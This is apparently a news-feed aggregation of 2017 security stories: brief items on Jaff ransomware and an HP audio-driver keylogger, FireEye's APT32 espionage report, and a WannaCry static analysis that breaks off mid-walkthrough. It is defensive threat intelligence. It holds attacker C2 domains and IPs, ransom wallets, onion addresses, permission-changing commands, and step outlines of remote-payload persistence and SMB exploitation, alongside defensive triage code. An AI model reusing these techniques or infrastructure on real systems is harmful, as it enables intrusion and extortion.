New Ransomware 'Jaff' Spotted; Malware Groups Pushing 5M Emails Per Hour To Circulate It

by msmash
An anonymous reader writes: The Necurs botnet has been harnessed to fling a new strain of ransomware dubbed "Jaff". Jaff spreads in a similar way to the infamous file-encrypting malware Locky and even uses the same payment site template, but is nonetheless a different monster. Attached to dangerous emails is an infectious PDF containing an embedded DOCM file with a malicious macro script. This script will then download and execute the Jaff ransomware. Locky -- like Jaff -- also used the Necurs botnet and a booby-trapped PDF, security firm Malwarebytes notes. "This is where the comparison ends, since the code base is different as well as the ransom itself," said Jerome Segura, a security researcher at Malwarebytes. "Jaff asks for an astounding 2 BTC, which is about $3,700 at the time of writing." Proofpoint reckons Jaff may be the work of the same cybercriminals behind Locky, Dridex and Bart (other nasty malware) but this remains unconfirmed. And Forcepoint Security Labs reports that malicious emails carrying Jaff are being cranked out at a rate of 5 million an hour on Thursday, or 13 million in total at the time it wrote up a blog post about the new threat.

Read more of this story at Slashdot.

15 May 13:54

Keylogger Found in Audio Driver of HP Laptops, Says Report

by msmash
An anonymous reader writes: The audio driver installed on some HP laptops includes a feature that could best be described as a keylogger, which records all the user's keystrokes and saves the information to a local file, accessible to anyone or any third-party software or malware that knows where to look. Swiss cyber-security firm modzero discovered the keylogger on April 28 and made its findings public today. According to researchers, the keylogger feature was discovered in the Conexant HD Audio Driver Package version 1.0.0.46 and earlier. This is an audio driver that is preinstalled on HP laptops. One of the files of this audio driver is MicTray64.exe (C:\windows\system32\mictray64.exe). This file is registered to start via a Scheduled Task every time the user logs into his computer. According to modzero researchers, the file "monitors all keystrokes made by the user to capture and react to functions such as microphone mute/unmute keys/hotkeys."

Read more of this story at Slashdot.

15 May 13:53

WikiLeaks Reveals 'AfterMidnight' & 'Assassin' CIA Windows Malware Frameworks

by noreply@blogger.com (Swati Khandelwal)
When the world was dealing with the threat of the self-spreading WannaCry ransomware, WikiLeaks released a new batch of CIA Vault 7 leaks, detailing two apparent CIA malware frameworks for the Microsoft Windows platform. Dubbed "AfterMidnight" and "Assassin," both malware programs are designed to monitor and report back actions on the infected remote host computer running the Windows
15 May 13:50

Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations

by Nick Carr

Cyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists. FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.

APT32 and FireEye’s Community Response

In the course of investigations into intrusions at several corporations with business interests in Vietnam, FireEye’s Mandiant incident response consultants uncovered activity and attacker-controlled infrastructure indicative of a significant intrusion campaign. In March 2017, in response to active targeting of FireEye clients, the team launched a Community Protection Event (CPE) – a coordinated effort between Mandiant incident responders, FireEye as a Service (FaaS), FireEye iSight Intelligence, and FireEye product engineering – to protect all clients from APT32 activity.

In the following weeks, FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32’s tools and phishing lures. This focused intelligence and detection effort led to new external victim identifications as well as providing sufficient technical evidence to link twelve prior intrusions, consolidating four previously unrelated clusters of threat actor activity into FireEye’s newest named advanced persistent threat group: APT32.

APT32 Targeting of Private Sector Company Operations in Southeast Asia

Since at least 2014, FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam’s manufacturing, consumer products, and hospitality sectors. Furthermore, there are indications that APT32 actors are targeting peripheral network security and technology infrastructure corporations.

Here is an overview of intrusions investigated by FireEye that are attributed to APT32:

  • In 2014, a European corporation was compromised prior to constructing a manufacturing facility in Vietnam.
  • In 2016, Vietnamese and foreign-owned corporations working in network security, technology infrastructure, banking, and media industries were targeted. 
  • In mid-2016, malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam.
  • From 2016 through 2017, two subsidiaries of U.S. and Philippine consumer products corporations, located inside Vietnam, were the target of APT32 intrusion operations.

Table 1 shows a breakdown of APT32 activity, including the malware families used in each.

| Year | Country | Industry | Malware |
|------|---------|----------|---------|
| 2014 | Vietnam | Network Security | WINDSHIELD |
| 2014 | Germany | Manufacturing | WINDSHIELD |
| 2015 | Vietnam | Media | WINDSHIELD |
| 2016 | Philippines | Consumer products | KOMPROGO, WINDSHIELD, SOUNDBITE, BEACON |
| 2016 | Vietnam | Banking | WINDSHIELD |
| 2016 | Philippines | Technology Infrastructure | WINDSHIELD |
| 2016 | China | Hospitality | WINDSHIELD |
| 2016 | Vietnam | Media | WINDSHIELD |
| 2016 | United States | Consumer Products | WINDSHIELD, PHOREAL, BEACON, SOUNDBITE |

Table 1: APT32 Private Sector Targeting Identified by FireEye

APT32 Interest in Political Influence and Foreign Governments

In addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign governments, as well as Vietnamese dissidents and journalists since at least 2013. Here is an overview of this activity:

  • A public blog published by the Electronic Frontier Foundation indicated that journalists, activists, dissidents, and bloggers were targeted in 2013 by malware and tactics consistent with APT32 operations.
  • In 2014, APT32 leveraged a spear-phishing attachment titled “Plans to crackdown on protesters at the Embassy of Vietnam.exe," which targeted dissident activity among the Vietnamese diaspora in Southeast Asia. Also in 2014, APT32 carried out an intrusion against a Western country’s national legislature.
  • In 2015, SkyEye Labs, the security research division of the Chinese firm Qihoo 360, released a report detailing threat actors that were targeting Chinese public and private entities including government agencies, research institutes, maritime agencies, sea construction, and shipping enterprises. The information included in the report indicated that the perpetrators used the same malware, overlapping infrastructure, and similar targets as APT32.
  • In 2015 and 2016, two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32.
  • In 2017, social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines.

APT32 Tactics

In their current campaign, APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros. Upon execution, the initialized file downloads multiple malicious payloads from remote servers. APT32 actors continue to deliver the malicious attachments via spear-phishing emails.

APT32 actors designed multilingual lure documents which were tailored to specific victims. Although the files had “.doc” file extensions, the recovered phishing lures were ActiveMime “.mht” web page archives that contained text and images. These files were likely created by exporting Word documents into single file web pages.

Table 2 contains a sample of recovered APT32 multilingual lure files.

| ActiveMime Lure File | MD5 |
|----------------------|-----|
| 2017年员工工资性津贴额统计报告.doc (2017 Statistical Report on Staff Salary and Allowances) | 5458a2e4d784abb1a1127263bd5006b5 |
| Thong tin.doc (Information) | ce50e544430e7265a45fab5a1f31e529 |
| Phan Vu Tutn CV.doc | 4f761095ca51bfbbf4496a4964e41d4f |
| Ke hoach cuu tro nam 2017.doc (2017 Bailout Plan) | e9abe54162ba4572c770ab043f576784 |
| Instructions to GSIS.doc | fba089444c769700e47c6b44c362f96b |
| Hoi thao truyen thong doc lap.doc (Traditional Games) | f6ee4b72d6d42d0c7be9172be2b817c1 |
| Giấy yêu cầu bồi thường mới 2016 - hằng.doc (New 2016 Claim Form) | aa1f85de3e4d33f31b4f78968b29f175 |
| Hoa don chi tiet tien no.doc (Debt Details) | 5180a8d9325a417f2d8066f9226a5154 |
| Thu moi tham du Hoi luan.doc (Collection of Participants) | f6ee4b72d6d42d0c7be9172be2b817c1 |
| Danh sach nhan vien vi pham ky luat.doc (List of Employee Violations) | 6baafffa7bf960dec821b627f9653e44 |
| Nội-dung-quảng-cáo.doc (Internal Content Advertising) | 471a2e7341f2614b715dc89e803ffcac |
| HĐ DVPM-VTC 31.03.17.doc | f1af6bb36cdf3cff768faee7919f0733 |

Table 2: Sampling of APT32 Lure Files

The Base64-encoded ActiveMime data also contained an OLE file with malicious macros. When opened, many lure files displayed fake error messages in an attempt to trick users into launching the malicious macros. Figure 1 shows a fake Gmail theme paired with a hexadecimal error code that encourages the recipient to enable content to resolve the error. Figure 2 displays another APT32 lure that used a convincing image of a fake Windows error message instructing the recipient to enable content to properly display document font characters.

Figure 1: Example APT32 Phishing Lure – Fake Gmail Error Message

Figure 2: Example APT32 Phishing Lure – Fake Text Encoding Error Message

APT32 operators implemented several novel techniques to track the efficacy of their phishing, monitor the distribution of their malicious documents, and establish persistence mechanisms to dynamically update backdoors injected into memory.

In order to track who opened the phishing emails, viewed the links, and downloaded the attachments in real-time, APT32 used cloud-based email analytics software designed for sales organizations. In some instances, APT32 abandoned direct email attachments altogether and relied exclusively on this tracking technique with links to their ActiveMime lures hosted externally on legitimate cloud storage services.

To enhance visibility into the further distribution of their phishing lures, APT32 utilized the native web page functionality of their ActiveMime documents to link to external images hosted on APT32 monitored infrastructure.

Figure 3 contains an example phishing lure with HTML image tags used for additional tracking by APT32.

Figure 3: Phishing Lure Containing HTML Image Tags for Additional Tracking

When a document with this feature is opened, Microsoft Word will attempt to download the external image, even if macros were disabled. In all phishing lures analyzed, the external images did not exist. Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images. When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms.
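The lure traits described above (a ".doc" that is really an ActiveMime ".mht" archive, a Base64 part that decodes to the ActiveMime container carrying the macro-bearing OLE file, and external image tags that Word fetches even with macros disabled) can be triaged offline before a document is ever opened. The following is an added example, not FireEye's code and not the Yara rule the post refers to; the sample archive, the tracker.example.invalid host and the function names are constructed for illustration.

```python
"""Triage a ".doc" attachment that may really be an ActiveMime (.mht) web archive."""
import base64
import email
import re
from email import policy

# Decoded ActiveMime blobs (the editdata.mso part of a Word single-file web page)
# start with this magic string.
ACTIVEMIME_MAGIC = b"ActiveMime"
IMG_SRC_RE = re.compile(rb"<img[^>]+src\s*=\s*[\"']?(https?://[^\"'\s>]+)", re.IGNORECASE)


def looks_like_mht(data: bytes) -> bool:
    """A genuine binary Word .doc starts with the OLE2 signature (D0 CF 11 E0);
    an .mht export starts with MIME headers. MIME text under a .doc extension is
    the mismatch the APT32 lures relied on."""
    head = data.lstrip()[:256].lower()
    return (head.startswith(b"mime-version:")
            or head.startswith(b"from:")
            or b"content-type: multipart/related" in head)


def triage_activemime(data: bytes) -> dict:
    """Return what a responder wants to know: is it MIME, does any part decode to an
    ActiveMime blob, and which external hosts would Word contact on open."""
    findings = {"is_mht": False, "has_activemime": False, "external_images": []}
    if not looks_like_mht(data):
        return findings
    findings["is_mht"] = True
    msg = email.message_from_bytes(data, policy=policy.default)
    for part in msg.walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True) or b""   # decode=True undoes base64
        if payload.startswith(ACTIVEMIME_MAGIC):
            findings["has_activemime"] = True
        if part.get_content_type() == "text/html":
            for m in IMG_SRC_RE.finditer(payload):
                findings["external_images"].append(m.group(1).decode("ascii", "replace"))
    return findings


def build_sample_lure() -> bytes:
    """Constructed stand-in for a lure: a multipart/related archive with a 1x1
    tracking image and an application/x-mso part. The blob body is zero padding,
    not real macro content; the host is a reserved .invalid name."""
    fake_blob = base64.b64encode(ACTIVEMIME_MAGIC + b"\x00" * 64).decode()
    html = ('<html><body><p>Enable content to view this document.</p>'
            '<img src="http://tracker.example.invalid/pixel.gif" width=1 height=1>'
            '</body></html>')
    return ("MIME-Version: 1.0\r\n"
            'Content-Type: multipart/related; boundary="----=_NextPart_01"\r\n\r\n'
            "------=_NextPart_01\r\n"
            'Content-Type: text/html; charset="us-ascii"\r\n'
            "Content-Transfer-Encoding: 7bit\r\n\r\n" + html + "\r\n"
            "------=_NextPart_01\r\n"
            "Content-Type: application/x-mso\r\n"
            "Content-Location: file:///C:/lure_files/editdata.mso\r\n"
            "Content-Transfer-Encoding: base64\r\n\r\n" + fake_blob + "\r\n"
            "------=_NextPart_01--\r\n").encode()


if __name__ == "__main__":
    print(triage_activemime(build_sample_lure()))
```

A hit on all three checks does not by itself prove malice (Word exports MHT legitimately), but a ".doc" that is MIME, carries ActiveMime and points at an external image is exactly the profile worth detonating in a sandbox rather than opening.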

Once macros were enabled on the target system, the malicious macros created two named scheduled tasks as persistence mechanisms for two backdoors on the infected system. The first named scheduled task launched an application whitelisting script protection bypass to execute a COM scriptlet that dynamically downloaded the first backdoor from APT32’s infrastructure and injected it into memory. The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script. In most lures, one scheduled task persisted an APT32-specific backdoor and the other scheduled task initialized a commercially-available backdoor as backup.

To illustrate the complexity of these lures, Figure 4 shows the creation of persistence mechanisms for recovered APT32 lure “2017年员工工资性津贴额统计报告.doc”.

Figure 4: APT32 ActiveMime Lures Create Two Named Scheduled Tasks

In this example, a scheduled task named “Windows Scheduled Maintenance” was created to run Casey Smith’s “Squiblydoo” App Whitelisting bypass every 30 minutes. While all payloads can be dynamically updated, at the time of delivery, this task launched a COM scriptlet (“.sct” file extension) that downloaded and executed Meterpreter hosted on images.chinabytes[.]info. Meterpreter then loaded Cobalt Strike BEACON, configured to communicate with 80.255.3[.]87 using the Safebrowsing malleable C2 profile to further blend in with network traffic. A second scheduled task named “Scheduled Defrags” was created by loading the raw task XML with a backdated task creation timestamp of June 2, 2016. This second task ran “mshta.exe” every 50 minutes which launched an APT32-specific backdoor delivered as shellcode in a PowerShell script, configured to communicate with the domains blog.panggin[.]org, share.codehao[.]net, and yii.yiihao126[.]net.
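The persistence pattern above (a benign-looking task name, task XML loaded raw with a backdated registration date, and a script host re-fetching code from a remote URL every N minutes) is what a responder can look for after exporting task definitions from a suspect host. This is an added example, not FireEye's code; the sample task XML, the c2.example.invalid URL and the 30-day backdating heuristic are assumptions made for illustration.

```python
"""Triage a Windows Task Scheduler XML definition for the APT32-style persistence pattern."""
import re
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Script hosts commonly used to pull and run code from a URL; regsvr32 is the
# host behind the "Squiblydoo" technique named in the post, mshta the second task's.
SCRIPT_HOSTS = {"regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                "powershell.exe", "rundll32.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def triage_task_xml(xml_text: str, observed_at: datetime,
                    backdate_tolerance: timedelta = timedelta(days=30)) -> dict:
    """observed_at is when the task was first seen on the host (e.g. the task file's
    creation time); a RegistrationInfo/Date far earlier than that is suspicious."""
    # Exported task files are UTF-16 with an encoding declaration; once decoded to str
    # the declaration must go, or ElementTree refuses the multi-byte encoding.
    xml_text = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text)
    root = ET.fromstring(xml_text)
    findings = {"name": None, "registration_date": None, "backdated": False,
                "remote_script_actions": []}
    uri = root.find("t:RegistrationInfo/t:URI", NS)
    findings["name"] = uri.text if uri is not None else None
    date_el = root.find("t:RegistrationInfo/t:Date", NS)
    if date_el is not None and date_el.text:
        # Dates look like 2016-06-02T10:15:00.0000000; drop the 7-digit fraction.
        reg = datetime.fromisoformat(date_el.text.strip().split(".")[0])
        findings["registration_date"] = reg
        # Heuristic (assumption, not from the post): a task "registered" long before it
        # appeared on disk was most likely written by hand with a forged timestamp.
        findings["backdated"] = reg < observed_at - backdate_tolerance
    for exe in root.findall("t:Actions/t:Exec", NS):
        cmd = (exe.findtext("t:Command", default="", namespaces=NS) or "").strip().strip('"')
        args = exe.findtext("t:Arguments", default="", namespaces=NS) or ""
        base = cmd.replace("/", "\\").split("\\")[-1].lower()
        url = URL_RE.search(args)
        if base in SCRIPT_HOSTS and url:
            findings["remote_script_actions"].append((base, url.group(0)))
    return findings


# Constructed sample modelled on the second task in the post: innocuous name, a 2016
# registration date, a 50-minute repetition and mshta.exe pointed at a remote URL.
SAMPLE_TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2016-06-02T10:15:00.0000000</Date>
    <URI>\\Scheduled Defrags</URI>
  </RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT50M</Interval></Repetition>
      <StartBoundary>2016-06-02T10:15:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>mshta.exe</Command>
      <Arguments>http://c2.example.invalid/update.hta</Arguments>
    </Exec>
  </Actions>
</Task>"""


def triage_sample() -> dict:
    """Run the triage against the constructed task as if first seen in March 2017."""
    return triage_task_xml(SAMPLE_TASK_XML, observed_at=datetime(2017, 3, 15))


if __name__ == "__main__":
    print(triage_sample())
```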

Figure 5 illustrates the chain of events for a single successful APT32 phishing lure that dynamically injects two multi-stage malware frameworks into memory.

Figure 5: APT32 Phishing Chain of Events

The impressive APT32 operations did not stop after they established a foothold in victim environments. Several Mandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon’s Invoke-Obfuscation framework.

APT32 regularly used stealthy techniques to blend in with legitimate user activity:

  • During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix.
  • In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol.
  • APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it. Another backdoor used an otherwise legitimate DLL filename padded with a non-printing OS command control code.

APT32 Malware and Infrastructure

APT32 appears to have a well-resourced development capability and uses a custom suite of backdoors spanning multiple protocols. APT32 operations are characterized through deployment of signature malware payloads including WINDSHIELD, KOMPROGO, SOUNDBITE, and PHOREAL. APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor. APT32 may also possess backdoor development capabilities for macOS.

The capabilities of this unique suite of malware are shown in Table 3.

Malware

Capabilities

WINDSHIELD

  • Command and control (C2) communications via TCP raw sockets
  • Four configured C2s and six configured ports – randomly-chosen C2/port for communications
  • Registry manipulation
  • Get the current module's file name
  • Gather system information including registry values, user name, computer name, and current code page
  • File system interaction including directory creation, file deletion, reading, and writing files
  • Load additional modules and execute code
  • Terminate processes
  • Anti-disassembly

KOMPROGO

  • Fully-featured backdoor capable of process, file, and registry management
  • Creating a reverse shell
  • File transfers
  • Running WMI queries
  • Retrieving information about the infected system

SOUNDBITE

  • C2 communications via DNS
  • Process creation
  • File upload
  • Shell command execution
  • File and directory enumeration/manipulation
  • Window enumeration
  • Registry manipulation
  • System information gathering

PHOREAL

  • C2 communications via ICMP
  • Reverse shell creation
  • Filesystem manipulation
  • Registry manipulation
  • Process creation
  • File upload

BEACON (Cobalt Strike)

  • Publicly available payload that can inject and execute arbitrary code into processes
  • Impersonating the security context of users
  • Importing Kerberos tickets
  • Uploading and downloading files
  • Executing shell commands
  • Configured with malleable C2 profiles to blend in with normal network traffic
  • Co-deployment and interoperability with Metasploit framework
  • SMB Named Pipe in-memory backdoor payload that enables peer-to-peer C2 and pivoting over SMB

Table 3: APT32 Malware and Capabilities

APT32 operators appear to be well-resourced and supported as they use a large set of domains and IP addresses as command and control infrastructure. The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions.

Figure 6 provides a summary of APT32 tools and techniques mapped to each stage of the attack lifecycle.

Figure 6: APT32 Attack Lifecycle

Outlook and Implications

Based on incident response investigations, product detections, and intelligence observations along with additional publications on the same operators, FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests. The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in, or preparing to invest in, the country. While the motivation for each APT32 private sector compromise varied – and in some cases was unknown – the unauthorized access could serve as a platform for law enforcement, intellectual property theft, or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations. Furthermore, APT32 continues to threaten political activism and free speech in Southeast Asia and the public sector worldwide. Governments, journalists, and members of the Vietnam diaspora may continue to be targeted.

While actors from China, Iran, Russia, and North Korea remain the most active cyber espionage threats tracked and responded to by FireEye, APT32 reflects a growing host of new countries that have adopted this dynamic capability. APT32 demonstrates how accessible and impactful offensive capabilities can be with the proper investment and the flexibility to embrace newly-available tools and techniques. As more countries utilize inexpensive and efficient cyber operations, there is a need for public awareness of these threats and renewed dialogue around emerging nation-state intrusions that go beyond public sector and intelligence targets.

APT32 Detection

Figure 7 contains a Yara rule that can be used to identify malicious macros associated with APT32’s phishing lures:

Figure 7: Yara Rule for APT32 Malicious Macros

Table 4 contains a sampling of the infrastructure that FireEye has associated with APT32 C2.

Table 4: Sampling of APT32 C2 Infrastructure

15 May 00:47

WCry/WanaCry Ransomware Technical Analysis

by Amanda Rousseau

As we discussed Friday when this outbreak began, the WCry or WanaCrypt0r ransomware spread quickly across Europe and Asia, impacting almost 100 countries and disrupting or closing 45 hospitals in the UK. As the ransomware continued to propagate, I got my hands on a sample and quickly began analyzing the malware. This post will walk through my findings and provide a technical overview of the strain of WCry ransomware which caused the massive impact on Friday.  Many have done great work analyzing this malware in action and helping contain its spread, and I hope my comprehensive static analysis will provide a good overall picture of this particular ransomware variant on top of that.

The Note

With estimates over 100,000 computers impacted globally thus far, many people received unwelcome notes Friday similar to those below demanding a fee to decrypt their files. Notes like these are unfortunately all too common and typical of today’s ransomware.  While the notes promise to return the data, it’s not guaranteed that paying the ransom will return data safe and sound, but if it gets this far and adequate backups are not in place, it may be the only recourse the victim has.  No one ever wants to see one of these.

Ransom Note

Ransom Note Desktop Background

Where to Begin?

There has been a lot of discussion about the method of propagation and the overall impact of this ransomware, but what does this ransomware actually do from start to finish?  That is the question I’ll answer in this post.

To begin, we accessed the malware by grabbing it (SHA256 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c / MD5 Db349b97c37d22f5ea1d1841e3c89eb4) from VirusTotal. See the appendix for a summary of the files dropped with the malware.

Dropper Malware Details

MD5: Db349b97c37d22f5ea1d1841e3c89eb4 

Dropped EXE Details

MD5: 84c82835a5d21bbcf75a61706d8ab549

The WCry Execution Flow

The WCry ransomware follows a flow similar to that of other ransomware as it damages a machine. The high-level flow is as follows: it begins with an initial beacon, which other researchers have already reported is essentially a killswitch. If it makes it past that step, it looks to exploit the ETERNALBLUE/MS17-010 vulnerability and propagate to other hosts. WCry then goes to work doing damage to the system, first laying the foundations for doing the damage and getting paid for recovery; once that’s done, WCry starts encrypting files on the system. See the diagram below for an overview of how this malware works. I’ll walk through each of these steps in more detail below.

WCry Execution Flow

As the graphic illustrates, the malware inflicts damage by executing a series of tasks. I’ll walk through each of these tasks, which are numbered below. Each first level of the outline corresponds to that step in the execution flow graphic.

Initial infection and propagation

1. Beacon to hxxp://www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com. Successful connection will cause the malware to quit.  Note that other researchers have reported seeing strains since Friday which have an alternate killswitch URL.  

2. Run the resource Exe as a new service

    a. If the command line args are “-m security”

        1. OpenSCmanager

        2. Create a new service called "Microsoft Security Center (2.0) Service"; "mssecsvc2.0" as mssecsvc.exe

        3. StartService

        4. Load Resource “tasksche.exe”

        5. Save as C:\\WINDOWS\\tasksche.exe

        6. Move C:\\WINDOWS\\tasksche.exe to C:\\WINDOWS\\qeriuwjhrf

    b. Else Propagate via SMB ETERNAL BLUE / DOUBLE PULSAR Exploit

        1. OpenSCManager

        2. Access service “mssecsvc2.0"

        3. Change Service Config

        4. Start Service Ctrl Dispatcher (Run SMB Exploit)

            a. Run thread containing the Payload transfer

Thread Payload

Setting up the payload

            b. GetAdaptersInfo to get IPs

            c. New thread to propagate the payload

Payload Delivery

                1. Get TCP Socket for Port 445 (Server Message Block/SMB)
                2. Connect to SMB Socket and get SMB tree_id

                    a. SMB_COM_NEGOTIATE
                    b. Get Tree: ipc_share = "\\\\#{ip}\\IPC$” and SMB_COM_TREE_CONNECT_ANDX
                    c. SMB_COM_TRANSACTION

Metasploit

Example Pseudocode: The screenshot above is from the Metasploit Framework's implementation created after the Shadow Broker's leaks and recent weaponized exploit from RiskSense-Ops.

                3. Run smb ms17-010 Exploit function
                    a. do_smb_ms17_010_probe(tree_id)

                        1. Setup SMB_TRANS_PKT

                    b. If vulnerable, do_smb_doublepulsar_probe(tree_id)
                        1. Prepare Base64 Payload in Memory
                        2. Setup SMBv1 Echo Packet
                        3. make_smb_trans2_doublepulsar

                            a. Setup SMB_TRANS2_PKT (See Appendix)
                        4. if code == 0x51: Successful payload
                    c. Execute Payload Shellcode (See Appendix)
Code 51
If code == 0x51 - successful payload!!!

    c. After Service execution

        1. Gets the computer name
        2. Randomizes string
        3. Get command line args and Checks for switch “/i”

Preparation for Ransomware Activity

3. Extract Zip and Prep Tor and Bitcoin Info:

    a. Extract resource zip file XIA with hardcoded password “WNcry@2ol7”
    b. Get c.wnry, which includes the Tor configuration used by the malware
    c. Extract the configuration from c.wnry to get the Tor browser download location and the onion sites to be used for communication:

        gx7ekbenv2riucmf.onion;
        57g7spgrzlojinas.onion;
        xxlvbrloxvriy2c5.onion;
        76jdd2ir2embyv47.onion;
        cwwnhwhlz52maqm7.onion;
        hxxps://dist[.]torproject[.]org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip

    d. Load Bitcoin wallets which have been previously set up by the attackers for payment for file restoration and update c.wnry

        "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94"
        "12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw"
        "115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn"

4. Hide Extract Zip Directory and Modify Security Descriptors

    a. Create process: runs a command to hide the current directory: "attrib +h ."
    b. Runs command: icacls . /grant Everyone:F /T /C /Q.  This grants all users full access to files in the current directory and all directories below.

5. Prep Encryption Public Key, AES Key, Decrypt the DLL

    a. Load exports with getprocaddress: CreateFileW, WriteFile, ReadFile, MoveFileW, MoveFileExW, DeleteFileW, CloseHandle
    b. Set up Encryption Keys

        1. Set up crypto function exports: CryptGenKey, CryptDecrypt, CryptEncrypt, CryptDestroyKey, CryptImportKey, CryptAcquireContextA
        2. Get RSA_AES Cryptographic Provider
        3. CryptImportKey import the hard coded public key


BOOL WINAPI CryptImportKey(
  _In_  HCRYPTPROV hProv,
  _In_  BYTE       *pbData,
  _In_  DWORD      dwDataLen,   // 1172B 2048 bit RSA key (See Appendix)
  _In_  HCRYPTKEY  hPubKey,
  _In_  DWORD      dwFlags,
  _Out_ HCRYPTKEY  *phKey
);

        4. Parse t.wnry to get the AES key used to decrypt the DLL
            a. WANACRY! Length 8
            b. Read Length 100h = Encrypted AES Key
            c. Read 4h = 04 00 00 00
            d. Read 8h DLL Length = 00 00 01 00 00 00 00 00
            e. Decrypt Encrypted AES Key with Public Key
            f. Read encrypted DLL length 1000h
            g. Decrypt DLL with custom AES-128-CBC algorithm with 16B AES Key (See Appendix)
        5. Get Native System Info and GetProcessHeap
        6. Put EncryptedData In Heap Location
        7. Change the protection of that memory location.
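The t.wnry layout in step 5 can be checked with a small parser; this is an added example, not part of the original analysis. It follows the byte layout listed above (8-byte "WANACRY!" magic, 0x100-byte RSA-encrypted AES key, 4-byte type field, 8-byte little-endian length, then the encrypted DLL), treats the 8-byte length field as authoritative for the payload size, and runs on a constructed filler container rather than the real file. No key material is included and the custom AES step is not attempted.

```python
"""Parse the WANACRY! container header that wraps WannaCry's encrypted DLL (t.wnry)."""
import struct
from typing import NamedTuple

MAGIC = b"WANACRY!"
ENC_KEY_LEN = 0x100                    # RSA-2048 ciphertext of the 16-byte AES key
# magic (8s), encrypted AES key (256s), type field (I), payload length (Q); little-endian
HEADER = struct.Struct("<8s256sIQ")


class WnryContainer(NamedTuple):
    enc_aes_key: bytes   # still RSA-encrypted; decrypting it needs the embedded key
    type_field: int      # 04 00 00 00 in the analysed sample
    payload_len: int     # 0x10000 in the analysed sample (bytes 00 00 01 00 00 00 00 00)
    payload: bytes       # AES-128-CBC ciphertext of the DLL, left encrypted here


def is_wnry_container(blob: bytes) -> bool:
    """Cheap check for the magic at offset 0, usable when sweeping dropped files."""
    return blob[:len(MAGIC)] == MAGIC


def parse_wnry_container(blob: bytes) -> WnryContainer:
    """Split the container into its fields, refusing truncated or mis-tagged input."""
    if len(blob) < HEADER.size:
        raise ValueError(f"blob is {len(blob)} bytes, header alone needs {HEADER.size}")
    magic, enc_key, type_field, payload_len = HEADER.unpack_from(blob, 0)
    if magic != MAGIC:
        raise ValueError("missing WANACRY! magic")
    payload = blob[HEADER.size:HEADER.size + payload_len]
    if len(payload) != payload_len:
        raise ValueError(f"truncated payload: header says {payload_len}, have {len(payload)}")
    return WnryContainer(enc_key, type_field, payload_len, payload)


def build_constructed_container(payload_len: int = 0x10000) -> bytes:
    """Constructed stand-in with filler key bytes and a zero payload of the length the
    analysis reports; it is not the real t.wnry and decrypts to nothing meaningful."""
    return HEADER.pack(MAGIC, b"\xaa" * ENC_KEY_LEN, 4, payload_len) + b"\x00" * payload_len


def parse_constructed() -> WnryContainer:
    return parse_wnry_container(build_constructed_container())


if __name__ == "__main__":
    c = parse_constructed()
    print(f"type={c.type_field:#x} payload_len={c.payload_len:#x} key_bytes={len(c.enc_aes_key)}")
```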

Encrypted DLL Details

96de5f0587f7201b9f5f16ba2e374f80

Spoofed information in the decrypted DLL’s VERSIONINFO resource

6. Run DLL Export at function TaskStart

7. Creates Encryption Keys to be used by the user file encryption routine

a. Create an encryption key by encrypting the user’s private key with the ransomware public key, storing it in “%08X.eky” (See Appendix)
b. Also tries to access “%08X.dky” for the received Decryption key

8. Creates Mutex for all threads: Global\\MsWinZonesCacheCounterMutexW

a. Other researchers have noted that if this mutex is present, the malware will not start, offering another way to defend against this malware.

9. Creates a new thread pointing to the setup that starts encrypting files

a. Generates AES Keys to encrypt files using CryptGenKey

 

Encryption routine

10. Creates a new thread to overwrite files on disk

a. Generate a key
b. Generate Data Buffers for each file
c. Call thread for function StartAddress to begin writing the encrypted file contents
